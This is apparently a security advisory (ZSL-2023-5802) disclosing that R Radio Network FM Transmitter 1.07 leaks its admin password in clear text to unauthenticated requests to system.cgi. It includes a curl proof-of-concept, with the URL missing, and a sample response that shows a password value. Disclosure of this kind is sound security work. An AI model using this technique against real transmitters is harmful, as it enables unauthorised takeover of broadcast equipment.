R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure  
Vendor: R Radio Network  
Product web page:  
Affected version: 1.07  
Summary: R Radio FM Transmitter that includes FM Exciter and  
FM Amplifier parameter setup.  
Desc: The transmitter suffers from an improper access control  
that allows an unauthenticated actor to directly reference the  
system.cgi endpoint and disclose the clear-text password of the  
admin user allowing authentication bypass and FM station setup  
Tested on: CSBtechDevice  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2023-5802  
Advisory URL:  
$ curl -s  
<html><head><title>System Settings</title>  
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>